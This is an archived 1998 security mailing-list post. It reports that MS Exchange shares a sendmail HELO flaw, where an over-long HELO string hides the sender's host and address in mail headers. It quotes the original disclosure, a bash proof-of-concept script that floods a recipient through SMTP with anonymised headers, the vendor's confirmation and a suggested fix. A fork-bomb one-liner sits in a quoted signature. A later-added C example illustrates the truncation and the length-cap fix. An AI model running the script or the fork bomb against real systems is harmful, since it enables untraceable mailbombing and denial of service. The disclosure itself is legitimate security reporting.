MS Exchange vulnerable. (was: about sendmail 8.8.8 HELO hole)

From: Yuri Krichevsky (yuryat_private)
Date: Wed May 27 1998 - 11:06:17 PDT


            Seems like MS Exchange Internet Mail Service 5.5 is vulnerable too.
    
    
    --
    
       "BSD code sucks. Of course, everything else sucks far more."
       - Theo de Raadt (OpenBSD President)
    
    
    
    > -----Original Message-----
    > From: Michał Zalewski <lcamtufat_private>
    > To: infoat_private <infoat_private>
    > Date: 10 January 1998 12:28
    > Subject: Sendmail 8.8.8 (qmail?) HELO hole.
    >
    >
    > Here's a brief description of a Sendmail (qmail) hole I found
    > recently:
    >
    > When someone mailbombs you, or tries to send fakemail, spam, etc -
    > sendmail normally attaches the sender's host name and its address
    > to the outgoing message:
    >
    > --
    > >From spamat_private Mon Jan  5 22:08:21 1998
    > Received: from spammer (marcat_private [150.129.84.5])
    >           by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376
    >           for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100
    > Date: Mon, 5 Jan 1998 22:07:54 +0100
    > From: spamat_private
    > Message-Id: <3.14159665@pi>
    >
    > MAILBOOM!!!
    > --
    >
    > That's perfect - now you know who is responsible for that annoying
    > junk in your mailbox: "Received: from spammer (marcat_private
    > [150.129.84.5])". Nothing easier...
    > But I found a small hole, which allows a user to hide his identity
    > and send mails anonymously. The only thing you need to do is to
    > pass a HELO string longer than approx. 1024 B - the sender's location and
    > other very useful information will be cropped!!! The message
    > headers then become uninteresting. Sometimes the sender
    > may become quite untraceable (but not always, if it's possible
    > to obtain logs from the machine which has been used to send):
    >
    > --
    > >From spamat_private Mon Jan  5 22:09:05 1998
    > Received: from xxxxxxxxxxxxxx... [a lot of 'x's] ...xxxx
    > Date: Mon, 5 Jan 1998 22:08:52 +0100
    > From: spamat_private
    > Message-Id: <3.14159665@pi>
    >
    > MAILBOOM!!! Now guess who am I...
    > --
    >
    >
    > Here's a simple example of Sendmail's HELO hole usage. Note, this
    > script has been written ONLY to show how easy sending
    > fakemails and mailbombs may be with the cooperation of Sendmail ;) The script is
    > very slow and restricted in many ways, but explains the problem
    > well (note, some non-Berkeley daemons are also affected,
    > probably Qmail?):
    >
    > -- EXPLOIT CODE --
    > #!/bin/bash
    > TMPDIR=/tmp/`whoami`
    > PLIK=$TMPDIR/.safe
    > TIMEOUT=2
    > LIMIT=10
    > MAX=20
    >
    > echo
    > echo "SafeBomb 1.02b -- sendmail HELO hole usage example"
    > echo "Author: Michal Zalewski <lcamtufat_private>"
    > echo
    >
    > if [ "$4" = "" ]; then
    >   echo "USAGE: $0 msgfile address server sender"
    >   echo
    >   echo "  msgfile - file to send as a message body"
    >   echo "  address - address of lucky recipient"
    >   echo "  server  - outgoing smtp server w/sendmail"
    >   echo "  sender  - introduce yourself"
    >   echo
    >   echo "WARNING: For educational use ONLY. Mailbombing is illegal."
    >   echo "Think twice BEFORE you use this program in any way. Also,"
    >   echo "I've never said this program is 100% safe nor bug-free."
    >   echo
    >   sleep 1
    >   exit 0
    > fi
    >
    > if [ ! -f $1 ]; then
    >   echo "Message file not found."
    >   echo
    >   exit 0
    > fi
    >
    > echo -n "Preparing message..."
    > mkdir $TMPDIR &>/dev/null
    > chmod 700 $TMPDIR
    > echo "echo \"helo
    > _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
    > omb__safebomb__safebomb__safebomb__safebomb__sa
    > febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
    > __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf
    > ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_
    > _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe
    > bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__
    > safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
    > omb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__s
    > afebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebo
    > mb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa
    > febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebom
    > b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf
    > ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
    > b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf
    > ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
    > __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe
    > bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_
    > _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
    > omb_\"" >$PLIK
    > echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK
    > echo "echo \"rcpt to: $2\"" >>$PLIK
    > echo "echo \"data\"" >>$PLIK
    > echo "cat <<__qniec__" >>$PLIK
    > cat $1 >>$PLIK
    > echo "__qniec__" >>$PLIK
    > echo "echo \".\"" >>$PLIK
    > echo "echo \"quit\"" >>$PLIK
    > echo "sleep $TIMEOUT" >>$PLIK
    > chmod +x $PLIK
    > echo "OK"
    >
    > echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort."
    > SENT=0
    >
    > while [ -f $1 ]; do
    >   $PLIK|telnet $3 25 &>/dev/null &
    >   let SENT=SENT+1
    >   echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b"
    >   CONNECTED=`ps|grep -c "telnet $3"`
    >   if [ "$LIMIT" -le "$CONNECTED" ]; then
    >     while [ "$LIMIT" -le "$CONNECTED" ]; do
    >       sleep 1
    >     done
    >   fi
    >   if [ "$SENT" -ge "$MAX" ]; then
    >     echo "It's just an example, sorry."
    >     echo
    >     exit 0
    >   fi
    > done
    > -- EOF --
    >
    > Suggested fix: insert an additional length limit into the HELO/EHLO
    > parameter scanning routine OR disable AllowBogusHELO (but it
    > may cause serious trouble). I have no 8.8.8 sources at the
    > moment, so excuse me if it's unclear.
    >
    > PS:
    >
    > --
    > From: Gregory Neil Shapiro <sendmail+gshapiroat_private>
    >
    > I was able to reproduce the header problem by lengthening the HELO string
    > in your script.
    >
    > [...]
    >
    > This will be fixed in sendmail 8.9.
    > --
    >
    > _______________________________________________________________________
    > Michał Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private]
    > To iterate is human, to recurse divine [P. Deutsch]
    > =--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=
    >
    
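The quoted post describes sendmail composing its Received: header from the raw HELO argument into a fixed-size buffer, so an over-long HELO pushes the resolved host and address off the end, and it suggests an extra length limit in the HELO/EHLO parameter scanning as the fix. The C program below is an added illustration of that mechanism and of the suggested cap, not sendmail's code; the buffer sizes, the host name "marc.example", the relay name and the demo() helper are assumptions made for the example, and only the address 150.129.84.5 is taken from the post.

```c
#include <stdio.h>
#include <string.h>

/* Assumed sizes, not sendmail's: a fixed header buffer of about the
 * 1024 bytes the post mentions, and a cap applied to the HELO argument. */
#define HDR_BUFSZ   1024
#define HELO_MAXLEN  256

/* Compose "Received: from <HELO> (<resolved host> [<ip>]) by <relay>".
 * cap_helo == 0 reproduces the reported behaviour: the raw HELO string is
 * used and can crowd the identifying part out of the fixed buffer.
 * cap_helo == 1 applies the suggested fix: the HELO argument is truncated
 * first, so "(<host> [<ip>])" always fits. Returns snprintf's result. */
int build_received(char *out, size_t outsz, const char *helo,
                   const char *host, const char *ip, const char *relay,
                   int cap_helo)
{
    char helo_buf[HELO_MAXLEN + 1];
    if (cap_helo) {
        snprintf(helo_buf, sizeof helo_buf, "%s", helo); /* cut at HELO_MAXLEN */
        helo = helo_buf;
    }
    return snprintf(out, outsz, "Received: from %s (%s [%s]) by %s",
                    helo, host, ip, relay);
}

/* 1 if the header still names the peer's address, 0 if it was cropped. */
int received_has_peer(const char *hdr, const char *ip)
{
    char needle[64];
    snprintf(needle, sizeof needle, "[%s]", ip);
    return strstr(hdr, needle) != NULL;
}

/* Demo: a constructed 2000-byte HELO ("xxxx...") against a relay that
 * resolved the peer as marc.example [150.129.84.5]. */
int demo(int cap_helo)
{
    char helo[2001], hdr[HDR_BUFSZ];
    memset(helo, 'x', 2000);
    helo[2000] = '\0';
    build_received(hdr, sizeof hdr, helo, "marc.example", "150.129.84.5",
                   "myhost.com", cap_helo);
    return received_has_peer(hdr, "150.129.84.5");
}

int main(void)
{
    printf("raw HELO keeps peer address:    %d\n", demo(0)); /* 0 */
    printf("capped HELO keeps peer address: %d\n", demo(1)); /* 1 */
    return 0;
}
```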



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:55:02 PDT